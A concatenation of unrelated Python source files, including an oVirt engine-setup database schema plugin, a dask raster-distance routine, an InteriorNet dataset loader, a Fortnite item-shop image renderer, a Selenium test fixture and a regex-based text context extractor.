gdf_dist = self.calculate_distance(tile, gdf_destination)
subset = self.dataset.rio.isel_window(window)
dataset_window = make_dataset_from_points(gdf_dist, resolution, subset)
data = dataset_window.dist_to.values
#tile.to_file(Path(__file__).resolve().parent.parent.joinpath(f'rubbish/tile_{index}.shp'))
#gdf_dist.to_file(Path(__file__).resolve().parent.parent.joinpath(f'rubbish/dist_{index}.shp'))
dst.write(data, 1, window=window)
index += 1
def calculate_dask(self, num_workers=4):
"""
Process calculations and rasterisation using multiple processes using dask
Parameters:
-----------
num_workers : int
Number of parallel processes to use
Returns:
----------
None
"""
import dask
from dask.distributed import Client, LocalCluster, as_completed
from dask import delayed
cluster = LocalCluster(n_workers=num_workers,
threads_per_worker=1,
processes=True,
memory_limit="5GB")
with Client(cluster) as client:
src = rasterio.open(self.in_raster)
resolution = tuple(src.get_transform()[5:] + src.get_transform()[1:2])
profile = src.profile.copy()
original_nodata = profile['nodata']
src.close()
profile.update({
"driver": "GTiff",
"count": 1,
"dtype": 'int32',
"nodata": -99999999
})
index = 0
futures = []
def process_(window, index):
_tile = get_points_from_pixels(self.dataset, window)
if self.buffer_method == 'centroid':
gdf_destination = self.get_destination_points_centroid_buffer(_tile)
elif self.buffer_method == 'corners':
gdf_destination = self.get_destination_points_corner_buffer(_tile)
#gdf_destination = self.get_destination_points(_tile)
gdf_dist = self.calculate_distance(_tile, gdf_destination)
subset = self.dataset.rio.isel_window(window)
dataset_window = make_dataset_from_points(gdf_dist, resolution, subset)
#dataset_window = make_dataset_from_points(gdf_dist, resolution)
data = dataset_window.dist_to.values
data_to_return = {'data': data, 'window': window, 'index': index}
return data_to_return
def process_nodata(data, window, index):
data = data.astype(np.int32)
data[data == original_nodata] = profile['nodata']
data_to_return = {'data': data, 'window': window, 'index': index}
return data_to_return
with rasterio.open(self.out_raster, 'w', **profile) as dst, rasterio.open(self.in_raster) as src:
for ij, window in src.block_windows():
data = src.read(1, window=window)
if np.all(data == original_nodata):
future = client.submit(process_nodata, data, window, index)
futures.append(future)
else:
future = client.submit(process_, window, index)
futures.append(future)
index += 1
completed = as_completed(futures)
for i in completed:
dst.write(i.result()['data'], 1, window=i.result()['window'])
print(i.result()['index'])
|
the-stack_0_25948
|
#
# ovirt-engine-setup -- ovirt engine setup
# Copyright (C) 2013-2015 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Schema plugin."""
import gettext
import os
from otopi import constants as otopicons
from otopi import plugin
from otopi import transaction
from otopi import util
from ovirt_engine_setup import constants as osetupcons
from ovirt_engine_setup.engine import constants as oenginecons
from ovirt_engine_setup.engine_common import constants as oengcommcons
from ovirt_engine_setup.engine_common import database
def _(m):
return gettext.dgettext(message=m, domain='ovirt-engine-setup')
@util.export
class Plugin(plugin.PluginBase):
"""Schema plugin."""
class SchemaTransaction(transaction.TransactionElement):
"""DB Schema transaction element."""
def __init__(self, parent, backup=None):
self._parent = parent
self._backup = backup
def __str__(self):
return _("Engine schema Transaction")
def prepare(self):
pass
def abort(self):
self._parent.logger.info(_('Rolling back database schema'))
try:
dbovirtutils = database.OvirtUtils(
plugin=self._parent,
dbenvkeys=oenginecons.Const.ENGINE_DB_ENV_KEYS,
)
self._parent.logger.info(
_('Clearing Engine database {database}').format(
database=self._parent.environment[
oenginecons.EngineDBEnv.DATABASE
],
)
)
dbovirtutils.clearDatabase()
if self._backup is not None and os.path.exists(self._backup):
self._parent.logger.info(
_('Restoring Engine database {database}').format(
database=self._parent.environment[
oenginecons.EngineDBEnv.DATABASE
],
)
)
dbovirtutils.restore(backupFile=self._backup)
except Exception as e:
self._parent.logger.debug(
'Error during Engine database restore',
exc_info=True,
)
self._parent.logger.error(
_('Engine database rollback failed: {error}').format(
error=e,
)
)
def commit(self):
pass
def __init__(self, context):
super(Plugin, self).__init__(context=context)
def _checkCompatibilityVersion(self):
statement = database.Statement(
dbenvkeys=oenginecons.Const.ENGINE_DB_ENV_KEYS,
environment=self.environment,
)
supported = set([
x.strip()
for x in self.environment[
osetupcons.CoreEnv.UPGRADE_SUPPORTED_VERSIONS
].split(',')
if x.strip()
])
vms = statement.execute(
statement="""
select
vm_name,
custom_compatibility_version
from
vms
where
custom_compatibility_version is not null
and
custom_compatibility_version <> '';
""",
ownConnection=True,
transaction=False,
)
if vms:
names = [
vm['vm_name']
for vm in vms if
vm['custom_compatibility_version']
not in supported
]
if names:
raise RuntimeError(
_(
'Cannot upgrade the Engine due to low '
'custom_compatibility_version for virtual machines: '
'{r}. Please edit this virtual machines, in edit VM '
'dialog go to System->Advanced Parameters -> Custom '
'Compatibility Version and either reset to empty '
'(cluster default) or set a value supported by the '
'new installation: {s}.'
).format(
r=names,
s=', '.join(sorted(supported)),
)
)
def _checkInvalidImages(self):
statement = database.Statement(
dbenvkeys=oenginecons.Const.ENGINE_DB_ENV_KEYS,
environment=self.environment,
)
invalidImagesForVms = statement.execute(
statement="""
SELECT
disk_alias,
image_guid,
vm_name
FROM
images
INNER JOIN vm_device ON
images.image_group_id = vm_device.device_id
INNER JOIN vm_static ON vm_device.vm_id = vm_static.vm_guid
INNER JOIN base_disks ON
images.image_group_id = base_disks.disk_id
AND vm_static.entity_type = 'VM'
AND vm_device.type = 'disk'
AND vm_device.device = 'disk'
AND images.vm_snapshot_id =
'00000000-0000-0000-0000-000000000000';
""",
ownConnection=True,
transaction=False,
)
if invalidImagesForVms:
self.logger.warn(
_(
'Engine DB is inconsistent due to the existence of invalid'
' {num} image(s) for virtual machine(s) as follows:\n'
'{imagesList}.\n'
'\nPlease consult support to resolve this issue. '
'Note that the upgrade will be blocked in the subsequent '
'release (4.3) if the issue isn\'t resolved.\n'
'If you choose to ignore this problem then snapshot '
'operations on the above virtual machine(s) may fail or '
'may corrupt the disk(s).\nTo fix this issue, you can '
'clone the virtual machine(s) by starting the engine, '
'searching for the affected\nvirtual machine(s) by name '
'(as listed above) and clicking on \'Clone VM\' for each '
'virtual machine in the list.\n'
'Warning: If there are snapshots for the cloned virtual '
'machine(s), they will be collapsed.\n\n'
).format(
num=len(invalidImagesForVms),
imagesList=invalidImagesForVms
)
)
def _checkDatabaseOwnership(self):
statement = database.Statement(
dbenvkeys=oenginecons.Const.ENGINE_DB_ENV_KEYS,
environment=self.environment,
)
result = statement.execute(
statement="""
select
nsp.nspname as object_schema,
cls.relname as object_name,
rol.rolname as owner,
case cls.relkind
when 'r' then 'TABLE'
when 'i' then 'INDEX'
when 'S' then 'SEQUENCE'
when 'v' then 'VIEW'
when 'c' then 'TYPE'
else
cls.relkind::text
end as object_type
from
pg_class cls join
pg_roles rol on rol.oid = cls.relowner join
pg_namespace nsp on nsp.oid = cls.relnamespace
where
nsp.nspname not in ('information_schema', 'pg_catalog') and
nsp.nspname not like 'pg_%%' and
cls.relname not like 'pg_%%' and
rol.rolname != %(user)s
order by
nsp.nspname,
cls.relname
""",
args=dict(
user=self.environment[oenginecons.EngineDBEnv.USER],
),
ownConnection=True,
transaction=False,
)
if len(result) > 0:
raise RuntimeError(
_(
'Cannot upgrade the Engine database schema due to wrong '
'ownership of some database entities.\n'
)
)
def _checkSupportedVersionsPresent(self):
# TODO: figure out a better way to do this for the future
statement = database.Statement(
dbenvkeys=oenginecons.Const.ENGINE_DB_ENV_KEYS,
environment=self.environment,
)
dcVersions = statement.execute(
statement="""
SELECT name, compatibility_version FROM storage_pool;
""",
ownConnection=True,
transaction=False,
)
clusterTable = statement.execute(
statement="""
SELECT table_name FROM information_schema.tables
WHERE table_name IN ('vds_groups', 'cluster');
""",
ownConnection=True,
transaction=False,
)
sql = _(
'SELECT name, compatibility_version FROM {table};'
).format(
table=clusterTable[0]['table_name']
)
clusterVersions = statement.execute(
statement=sql,
ownConnection=True,
transaction=False,
)
versions = set([
x['compatibility_version']
for x in dcVersions + clusterVersions
])
supported = set([
x.strip()
for x in self.environment[
osetupcons.CoreEnv.UPGRADE_SUPPORTED_VERSIONS
].split(',')
if x.strip()
])
if versions - supported:
for (queryres, errmsg) in (
(
dcVersions,
_(
'The following Data Centers have a too old '
'compatibility level, please upgrade them:'
)
),
(
clusterVersions,
_(
'The following Clusters have a too old '
'compatibility level, please upgrade them:'
)
),
):
objs = [
x['name']
for x in queryres
if x['compatibility_version'] not in supported
]
if objs:
self.logger.error(errmsg)
self.dialog.note('\n'.join(objs))
raise RuntimeError(
_(
'Trying to upgrade from unsupported versions: {versions}'
).format(
versions=' '.join(versions - supported)
)
)
@plugin.event(
stage=plugin.Stages.STAGE_VALIDATION,
after=(
oengcommcons.Stages.DB_CREDENTIALS_AVAILABLE_EARLY,
),
condition=lambda self: (
self.environment[oenginecons.CoreEnv.ENABLE] and
not self.environment[
oenginecons.EngineDBEnv.NEW_DATABASE
]
),
)
def _validation(self):
self._checkDatabaseOwnership()
self._checkSupportedVersionsPresent()
self._checkCompatibilityVersion()
self._checkInvalidImages()
@plugin.event(
stage=plugin.Stages.STAGE_MISC,
name=oengcommcons.Stages.DB_SCHEMA,
after=(
oengcommcons.Stages.DB_CREDENTIALS_AVAILABLE_LATE,
),
condition=lambda self: self.environment[oenginecons.CoreEnv.ENABLE],
)
def _misc(self):
backupFile = None
# If we are upgrading to a newer postgresql, do not backup or rollback.
# If we upgrade by copying, we can rollback by using the old
# version. If we upgrade in-place, we do not support rollback,
# and user should take care of backups elsewhere.
if not self.environment[
oenginecons.EngineDBEnv.NEED_DBMSUPGRADE
]:
if not self.environment[
oenginecons.EngineDBEnv.NEW_DATABASE
]:
dbovirtutils = database.OvirtUtils(
plugin=self,
dbenvkeys=oenginecons.Const.ENGINE_DB_ENV_KEYS,
)
backupFile = dbovirtutils.backup(
dir=self.environment[
oenginecons.ConfigEnv.OVIRT_ENGINE_DB_BACKUP_DIR
],
prefix=oenginecons.Const.ENGINE_DB_BACKUP_PREFIX,
)
self.environment[otopicons.CoreEnv.MAIN_TRANSACTION].append(
self.SchemaTransaction(
parent=self,
backup=backupFile,
)
)
self.logger.info(_('Creating/refreshing Engine database schema'))
args = [
oenginecons.FileLocations.OVIRT_ENGINE_DB_SCHMA_TOOL,
'-s', self.environment[oenginecons.EngineDBEnv.HOST],
'-p', str(self.environment[oenginecons.EngineDBEnv.PORT]),
'-u', self.environment[oenginecons.EngineDBEnv.USER],
'-d', self.environment[oenginecons.EngineDBEnv.DATABASE],
'-l', self.environment[otopicons.CoreEnv.LOG_FILE_NAME],
'-c', 'apply',
]
if self.environment[
osetupcons.CoreEnv.DEVELOPER_MODE
]:
if not os.path.exists(
oenginecons.FileLocations.OVIRT_ENGINE_DB_MD5_DIR
):
os.makedirs(
oenginecons.FileLocations.OVIRT_ENGINE_DB_MD5_DIR
)
args.extend(
[
'-m',
os.path.join(
oenginecons.FileLocations.OVIRT_ENGINE_DB_MD5_DIR,
'%s-%s.scripts.md5' % (
self.environment[
oenginecons.EngineDBEnv.HOST
],
self.environment[
oenginecons.EngineDBEnv.DATABASE
],
),
),
]
)
rc, stdout, stderr = self.execute(
args=args,
envAppend={
'DBFUNC_DB_PGPASSFILE': self.environment[
oenginecons.EngineDBEnv.PGPASS_FILE
]
},
raiseOnError=False,
)
if rc:
self.logger.error(
'%s: %s',
os.path.basename(
oenginecons.FileLocations.OVIRT_ENGINE_DB_SCHMA_TOOL
),
stderr[-1]
)
raise RuntimeError(_('Engine schema refresh failed'))
# vim: expandtab tabstop=4 shiftwidth=4
|
the-stack_0_25950
|
import math
import os
import random
import re
import numpy as np
import sys
from PIL import Image
from viewformer.utils import SplitIndices
from viewformer.utils.geometry import look_at_to_cameras
from viewformer.data._common import ArchiveStore
from viewformer.data._common import ShuffledLoader
class _InteriorNetLoader:
_custom_shuffle = True
def __init__(self, path: str, sequence_size: int = None, max_environments_per_scene: int = -1, seed: int = 42,
parts: SplitIndices = None, shuffle_sequence_items: bool = None, shuffle_sequences: bool = False, split: str = None):
if parts is None:
parts = SplitIndices('7')
dataset_parts = parts.restrict(range(1, 8))
assert max_environments_per_scene, 'Currently, only max_environments_per_scene=1 is supported'
assert not shuffle_sequences
assert split in {'train', 'test'}
self.images_per_environment = sequence_size or 20
self.max_environments_per_scene = max_environments_per_scene
# NOTE: These ignored files can likely be removed
# The following files were probably incorectly downloaded
# We will keep them for reproducibility
# NOTE: also, all tar files were converted to zip
self._ignored_files = [
'3FO4K5I8T7KR', '3FO4K5I8T7KR', '3FO4K3GYULI6', '3FO4K5I8T7KR',
'3FO4K35GPEA7', '3FO4K6XVLSCH', '3FO4K33RY528', '3FO4JXJX64SU',
'3FO4K5LPQL51', '3FO4K6YTSO3Y', '3FO4K6WXLP01', ]
# NOTE first 3% are testing data
self._environment_files = []
self._hd16_len = 0
self._hd7_len = 0
self._images_per_scene = (3000, 20)
self._environment_per_scene = tuple(
min(max_environments_per_scene, x // self.images_per_environment)
if max_environments_per_scene > 0
else x // self.images_per_environment for x in self._images_per_scene)
assert os.path.exists(os.path.join(path, 'GroundTruth_HD1-HD6')), 'Not a valid dataset, missing GroundTruth_HD1-HD6 folder'
for i in sorted(dataset_parts):
assert os.path.exists(os.path.join(path, f'HD{i}')), f'Not a valid dataset, missing HD{i} folder'
part_files = [os.path.join(path, f'HD{i}', x) for x in ArchiveStore.list_archives(os.path.join(path, f'HD{i}')) if x not in self._ignored_files]
part_files = sorted(part_files)
if split is not None:
num_test = int(math.ceil(len(part_files) * 0.03))
if split == 'test':
part_files = part_files[:num_test]
else:
part_files = part_files[num_test:]
self._environment_files.extend(part_files)
if i < 7:
self._hd16_len += len(part_files)
else:
self._hd7_len += len(part_files)
self._ctx = None
self.shuffle_environment = shuffle_sequence_items
def get_intrinsics(self):
# Return (image_height, image_width, f_x, f_y, c_x, c_y)
return (640, 480, 600, 600, 320, 240)
def __len__(self):
hd16_size, hd7_size = self._environment_per_scene
return self._hd16_len * hd16_size + self._hd7_len * hd7_size
def num_images_per_sequence(self):
return [self.images_per_environment] * len(self)
def _rotate_system(self, pos):
x, y, z = np.moveaxis(pos, -1, 0)
return np.stack((y, -z, -x), -1)
def _convert_poses(self, poses):
# first three elements, eye and next three, lookAt and the last there, up direction
eye = self._rotate_system(poses[..., 0:3])
lookat = self._rotate_system(poses[..., 3:6])
up = self._rotate_system(poses[..., 6:9])
return look_at_to_cameras(eye, lookat, up)
def close(self):
if self._ctx is not None:
self._ctx.__exit__()
self._ctx = None
def _ensure_context(self):
if self._ctx is None:
self._ctx = ArchiveStore.with_context().__enter__()
def __enter__(self, *args, **kwargs):
self._ensure_context()
return self
def __exit__(self, *args, **kwargs):
self.close()
def _parse_cam(self, file):
last_id = None
for line in file:
line = line.rstrip('\n\r')
vals = line.split()
if vals[0].isnumeric():
if last_id != vals[0]:
yield vals[0], np.array([float(x) for x in vals[1:]], dtype='float32')
last_id = vals[0]
def __getitem__(self, i):
self._ensure_context()
hd16_size, hd7_size = self._environment_per_scene
if i >= self._hd16_len * hd16_size:
env_i = (i - self._hd16_len * hd16_size) // hd7_size + self._hd16_len
i = (i - self._hd16_len * hd16_size) % hd7_size
is_hd16 = False
else:
env_i = i // hd16_size
i = i % hd16_size
is_hd16 = True
fname = self._environment_files[env_i]
images = []
# depthmaps = []
cameras = []
data = []
with ArchiveStore(fname) as archive:
if is_hd16:
par_dir, archivename = os.path.split(fname)
par_dir = os.path.join(os.path.dirname(par_dir), 'GroundTruth_HD1-HD6')
with ArchiveStore(os.path.join(par_dir, archivename)) as gt_archive:
subdirs = [re.match(r'^.*(\d+_\d+)$', x) for x in gt_archive.ls('')]
subdir_postfixes = [x.group(1) for x in subdirs if x is not None]
subdirs = [f'original_{x}/' for x in subdir_postfixes]
for subdir, postfix in zip(subdirs, subdir_postfixes):
with gt_archive.open(f'velocity_angular_{postfix}/cam0.render', 'r') as f:
for pose_id, pose_data in self._parse_cam(f):
data.append((subdir, pose_id, pose_data))
else:
with archive.open('cam0.render', 'r') as f:
for pose_id, pose_data in self._parse_cam(f):
data.append(('', pose_id, pose_data))
rng = random.Random(env_i)
if self.shuffle_environment:
rng.shuffle(data)
num_resamples = 0
rng.seed(i)
def try_add(i):
nonlocal num_resamples
subdir, pose_id, pose_data = data[i]
try:
image = np.array(Image.open(archive.open(f'{subdir}cam0/data/{pose_id}.png', 'rb')).convert('RGB'))
# depthmap = np.array(Image.open(archive.open(f'{subdir}depth0/data/{pose_id}.png', 'rb')).convert('F'))
images.append(image)
# depthmaps.append(depthmap)
cameras.append(pose_data)
except Exception as e:
print(f'Invalid image file "{subdir}cam0/data/{pose_id}.png" or "{subdir}depth0/data/{pose_id}.png" in archive {fname}', file=sys.stderr)
if num_resamples >= 1:
raise e
num_resamples += 1
try_add(rng.randrange(0, len(data)))
for j in range(i * self.images_per_environment, (i + 1) * self.images_per_environment):
try_add(j)
output = dict()
cameras = np.stack(cameras, 0)
cameras = self._convert_poses(cameras)
output['cameras'] = cameras
output['frames'] = np.stack(images, 0)
# output['depthmaps'] = np.stack(depthmaps, 0)
return output
class InteriorNetLoader(_InteriorNetLoader):
def __new__(cls, *args, shuffle_sequences: bool = None, **kwargs):
loader = _InteriorNetLoader(*args, **kwargs)
if shuffle_sequences:
loader = ShuffledLoader(loader, kwargs.get('seed', 42), shuffle_sequences=True)
return loader
def __init__(self, *args, **kwargs):
raise NotImplementedError()
if __name__ == '__main__':
import sys
ll = InteriorNetLoader(sys.argv[1], image_only=True)
ll[0]
breakpoint()
|
the-stack_0_25951
|
import io
import aiofiles
import aiohttp
from PIL import Image, ImageFont, ImageDraw
def GetMiddle(x, y):
return (x - y) / 2
def GetBlendColor(Rarity):
if Rarity == "frozen":
blendColor = (148, 223, 255)
elif Rarity == "lava":
blendColor = (234, 141, 35)
elif Rarity == "legendary":
blendColor = (255, 255, 255)
elif Rarity == "dark":
blendColor = (251, 34, 223)
elif Rarity == "starwars":
blendColor = (231, 196, 19)
elif Rarity == "marvel":
blendColor = (197, 51, 52)
elif Rarity == "dc":
blendColor = (84, 117, 199)
elif Rarity == "icon":
blendColor = (54, 183, 183)
elif Rarity == "shadow":
blendColor = (113, 113, 113)
elif Rarity == "epic":
blendColor = (177, 91, 226)
elif Rarity == "rare":
blendColor = (73, 172, 242)
elif Rarity == "uncommon":
blendColor = (96, 170, 58)
elif Rarity == "common":
blendColor = (190, 190, 190)
elif Rarity == "slurp":
blendColor = (17, 189, 240)
else:
blendColor = (255, 255, 255)
return blendColor
async def GenerateShopImage(Store: dict, background_user: str = "https://peely.de/api/background.jpg",
text: str = "Fortnite Item Shop"):
# Featured items
FeaturedItemsCount = len(Store["featured"]['entries'])
F_Lines = 1
F_Height = (545 * F_Lines) + 20
F_Width = (300 * FeaturedItemsCount) + 20
while F_Width > F_Height:
F_Lines += 1
F_ImagesPerLine = round((FeaturedItemsCount / F_Lines) + 0.49)
F_Height = (545 * F_Lines) + 20
F_Width = (300 * F_ImagesPerLine) + 20
while ((F_Lines * F_ImagesPerLine) - FeaturedItemsCount) > F_ImagesPerLine or (
(F_Lines * F_ImagesPerLine) - FeaturedItemsCount) == F_ImagesPerLine:
F_Lines -= 1
F_Height = (545 * F_Lines) + 20
F_Width = (300 * F_ImagesPerLine) + 20
# Daily items
DailyItemsCount = len(Store["daily"]['entries'])
D_Lines = 1
D_Height = (545 * D_Lines)
D_Width = (300 * DailyItemsCount)
while D_Width > D_Height and D_Lines < F_Lines:
D_Lines += 1
D_ImagesPerLine = round(((DailyItemsCount) / D_Lines) + 0.49)
D_Height = (545 * D_Lines)
D_Width = (300 * D_ImagesPerLine)
while ((D_Lines * D_ImagesPerLine) - DailyItemsCount) > D_ImagesPerLine or (
(D_Lines * D_ImagesPerLine) - DailyItemsCount) == D_ImagesPerLine:
D_Lines -= 1
D_Width = (300 * D_ImagesPerLine)
# Open Background
async with aiohttp.ClientSession() as session:
async with session.get(background_user) as resp:
if resp.status == 200:
f = await aiofiles.open('assets/cache/temp.png', mode='wb')
await f.write(await resp.read())
await f.close()
Background = Image.open(
io.BytesIO(await (await aiofiles.open("assets/cache/temp.png", mode='rb')).read())).resize(
(int(F_Width + D_Width + 20 + 50), int(F_Height + 510)),
Image.ANTIALIAS)
Draw = ImageDraw.Draw(Background)
Burbank = ImageFont.truetype(f"assets/Fonts/BurbankBigCondensed-Black.otf", 100)
# Adspace
NewsAdpsace = Image.open(
io.BytesIO(await (await aiofiles.open("assets/Images/T_newPVP_Texture.png", mode='rb')).read()))
AdspaceFont = ImageFont.truetype('assets/Fonts/BurbankBigCondensed-Black.otf', 32)
def Adspace(X, Y, SpaceText):
X -= 14
Y -= 14
AdspaceLeft = NewsAdpsace.crop((0, 0, 23, 50))
AdspaceMiddle = NewsAdpsace.crop((23, 0, 66, 50)).resize((AdspaceFont.getsize(SpaceText)[0] - 15, 50),
Image.ANTIALIAS)
AdspaceRight = NewsAdpsace.crop((66, 0, 100, 50))
Background.paste(AdspaceLeft, (X, Y), AdspaceLeft)
Background.paste(AdspaceMiddle, (X + AdspaceLeft.width, Y), AdspaceMiddle)
Background.paste(AdspaceRight, (X + AdspaceLeft.width + AdspaceMiddle.width, Y), AdspaceRight)
AdspaceLeft = NewsAdpsace.crop((0, 0, 21, 50))
Draw.text((X + AdspaceLeft.width - 3, Y + 4), SpaceText, font=AdspaceFont)
# Pasting items
currentHeight = 510
currentWidth = 20
# Paste Featured
for Item in Store["featured"]['entries']:
card = await GenerateStoreCard(Item)
Background.paste(card, (currentWidth, currentHeight))
try:
if Item["banner"]:
Adspace(currentWidth, currentHeight, Item["banner"]['value'])
except KeyError:
pass
currentWidth += 300
if F_Width == currentWidth:
currentWidth = 20
currentHeight += 545
D_Width = Background.width - 20
dailyStarts = F_Width + 50
currentWidth = dailyStarts
currentHeight = 510
# Paste Daily
for Item in Store["daily"]['entries']:
card = await GenerateStoreCard(Item)
Background.paste(card, (currentWidth, currentHeight))
try:
if Item["banner"]:
Adspace(currentWidth, currentHeight, Item["banner"]['value'])
except KeyError:
pass
currentWidth += 300
if D_Width == currentWidth:
currentWidth = dailyStarts
currentHeight += 545
# Draw Featured and Daily
FMiddle = GetMiddle(F_Width, Burbank.getsize(Store['featured']['name'])[0])
Draw.text((FMiddle + 20, 350), Store['featured']['name'], (255, 255, 255), font=Burbank)
DMiddle = GetMiddle(Background.width - 20 - dailyStarts, Burbank.getsize(Store['daily']['name'])[0])
Draw.text((DMiddle + dailyStarts, 350), Store['daily']['name'], (255, 255, 255), font=Burbank)
# Draw Fortnite Item Shop
size = 300
BurbankBigCondensed = ImageFont.truetype(f"assets/Fonts/BurbankBigCondensed-Black.otf", size)
while Background.width <= BurbankBigCondensed.getsize(text)[0]:
size -= 1
BurbankBigCondensed = ImageFont.truetype(f"assets/Fonts/BurbankBigCondensed-Black.otf", size)
size -= 15
BurbankBigCondensed = ImageFont.truetype(f"assets/Fonts/BurbankBigCondensed-Black.otf", size)
Middle = GetMiddle(Background.width, BurbankBigCondensed.getsize(text)[0])
Draw.text((Middle, (375 - BurbankBigCondensed.getsize(text)[1])/2), text, (255, 255, 255), font=BurbankBigCondensed)
return Background
async def GenerateCard(Item):
card = Image.new("RGBA", (300, 545))
Draw = ImageDraw.Draw(card)
Name = Item["name"]
Rarity = Item["rarity"]['value']
blendColor = GetBlendColor(Rarity.lower())
Category = Item["type"]['value']
if Item["images"]["featured"]:
Icon = Item["images"]["featured"]
elif Item["images"]["icon"]:
Icon = Item["images"]["icon"]
elif Item["images"]["smallIcon"]:
Icon = Item["images"]["smallIcon"]
else:
print(Item["name"] + " Image not found!")
return card
try:
layer = Image.open(
io.BytesIO(await (await aiofiles.open(f"assets/Images/card_inside_{Rarity}.png", mode='rb')).read()))
except:
layer = Image.open(
io.BytesIO(await (await aiofiles.open("assets/Images/card_inside_common.png", mode='rb')).read()))
card.paste(layer)
# Download the Item icon
try:
async with aiohttp.ClientSession() as cs:
async with cs.get(Icon) as data:
Icon = Image.open(io.BytesIO(await data.read()))
except Exception as ex:
print("DOWNLOAD ITEM ICON ERROR", ex)
pass
if (Category == "outfit") or (Category == "emote"):
ratio = max(285 / Icon.width, 365 / Icon.height)
elif Category == "wrap":
ratio = max(230 / Icon.width, 310 / Icon.height)
else:
ratio = max(310 / Icon.width, 390 / Icon.height)
Icon = Icon.resize((int(Icon.width * ratio), int(Icon.height * ratio)), Image.ANTIALIAS)
Icon = Icon.convert("RGBA")
Middle = int((card.width - Icon.width) / 2) # Get the middle of card and icon
# Paste the image
if (Category == "outfit") or (Category == "emote"):
card.paste(Icon, (Middle, 0), Icon)
else:
card.paste(Icon, (Middle, 15), Icon)
try:
layer = Image.open(
io.BytesIO(await (await aiofiles.open(f"assets/Images/card_faceplate_{Rarity}.png", mode='rb')).read()))
except:
layer = Image.open(
io.BytesIO(await (await aiofiles.open("assets/Images/card_faceplate_common.png", mode='rb')).read()))
try:
card.paste(layer, layer)
except:
pass
BurbankBigCondensed = ImageFont.truetype(f"assets/Fonts/BurbankBigCondensed-Black.otf", 30)
textWidth = BurbankBigCondensed.getsize(f"{Item['type']['displayValue']}")[0]
Middle = int((card.width - textWidth) / 2)
Draw.text((Middle, 385), f"{Item['type']['displayValue']}", blendColor, font=BurbankBigCondensed)
FontSize = 56
while ImageFont.truetype(f"assets/Fonts/BurbankBigCondensed-Black.otf", FontSize).getsize(Name)[0] > 265:
FontSize -= 1
BurbankBigCondensed = ImageFont.truetype(f"assets/Fonts/BurbankBigCondensed-Black.otf", FontSize)
textWidth = BurbankBigCondensed.getsize(Name)[0]
change = 56 - FontSize
Middle = int((card.width - textWidth) / 2)
Top = 425 + change / 2
Draw.text((Middle, Top), Name, (255, 255, 0), font=BurbankBigCondensed)
return card
async def GenerateStoreCard(Item):
card = await GenerateCard(Item["items"][0])
Draw = ImageDraw.Draw(card)
Name = Item["items"][0]["name"]
if len(Item["items"]) > 1:
i = 0
for extra in Item["items"][1:]:
try:
extraRarity = extra["rarity"]
extraIcon = extra["images"]["smallIcon"]
except:
pass
try:
layer = Image.open(io.BytesIO(
await (await aiofiles.open(f"assets/Images/box_bottom_{extraRarity}.png", mode='rb')).read()))
except:
layer = Image.open(
io.BytesIO(await (await aiofiles.open("assets/Images/box_bottom_common.png", mode='rb')).read()))
card.paste(layer, ((card.width - (layer.width + 9)), (9 + ((i // 1) * (layer.height)))))
# Download the icon
try:
async with aiohttp.ClientSession() as cs:
async with cs.get(extraIcon) as data:
extraIcon = Image.open(io.BytesIO(await data.read()))
except Exception as ex:
print("ERROR BEIM NORMALEN ICON", ex)
pass
ratio = max(75 / extraIcon.width, 75 / extraIcon.height)
extraIcon = extraIcon.resize((int(extraIcon.width * ratio), int(extraIcon.height * ratio)), Image.ANTIALIAS)
# Paste icon
try:
layer = Image.open(io.BytesIO(
await (await aiofiles.open(f"assets/Images/box_faceplate_{extraRarity}.png", mode='rb')).read()))
except:
layer = Image.open(
io.BytesIO(await (await aiofiles.open("assets/Images/box_faceplate_common.png", mode='rb')).read()))
extraIcon = extraIcon.convert("RGBA")
card.paste(extraIcon, ((card.width - (layer.width + 9)), (9 + ((i // 1) * (extraIcon.height))),), extraIcon)
card.paste(layer, ((card.width - (layer.width + 9)), (9 + ((i // 1) * (layer.height)))), layer)
i += 1
vbucks = Image.open(io.BytesIO(await (await aiofiles.open("assets/Images/vbucks.png", mode='rb')).read()))
if Item["finalPrice"] == 0:
price = "Free"
else:
price = str(Item["finalPrice"])
BurbankBigCondensed = ImageFont.truetype(f"assets/Fonts/BurbankBigCondensed-Black.otf", 30)
textWidth = BurbankBigCondensed.getsize(price)[0]
Middle = int((card.width - ((textWidth - 5) - vbucks.width)) / 2)
Draw.text((Middle, 490), price, (255, 255, 255), font=BurbankBigCondensed)
Middle = int((card.width - (vbucks.width + (textWidth + 5))) / 2)
card.paste(vbucks, (Middle, 495), vbucks)
FontSize = 56
while ImageFont.truetype(f"assets/Fonts/BurbankBigCondensed-Black.otf", FontSize).getsize(Name)[0] > 265:
FontSize -= 1
BurbankBigCondensed = ImageFont.truetype(f"assets/Fonts/BurbankBigCondensed-Black.otf", FontSize)
textWidth = BurbankBigCondensed.getsize(Name)[0]
change = 56 - FontSize
Middle = int((card.width - textWidth) / 2)
Top = 425 + change / 2
Draw.text((Middle, Top), Name, (255, 255, 255), font=BurbankBigCondensed)
return card
|
the-stack_0_25953
|
from selenium import webdriver
from fixture.session import SessionHelper
__author__ = 'Dzmitry'
class Application:
def __init__(self, browser, base_url):
if browser == "firefox":
self.wd = webdriver.Firefox()
elif browser == "chrome":
self.wd = webdriver.Chrome()
elif browser == "ie":
self.wd = webdriver.Ie()
elif browser == "opera":
self.wd = webdriver.Opera()
else:
raise ValueError("Unrecognized browser %s" % browser)
self.session = SessionHelper(self)
self.base_url = base_url
def is_valid(self):
try:
self.wd.current_url
return True
except:
return False
def open_home_page(self):
wd = self.wd
wd.get(self.base_url)
def destroy(self):
self.wd.quit()
|
the-stack_0_25954
|
from maltreatment_nlp.patterns import ALL_PATTERNS
def run(text, **metadata):
for name, pat in ALL_PATTERNS.items():
for m in pat.finditer(text):
yield metadata | {
'pre_context': ' '.join(text[max(m.start() - 100, 0): m.start()].split()).strip(),
'post_context': ' '.join(text[m.end(): m.end() + 100].split()).strip(),
'term': m.group(),
'pattern': name,
}
def get_keys(**metadata):
"""Get all keys, e.g., for creating a csv file with csv.dictwriter"""
return ['pre_context', 'term', 'post_context', 'pattern'] + list(metadata.keys())
|
the-stack_0_25957
|
# -*- coding: utf-8 -*-
"""
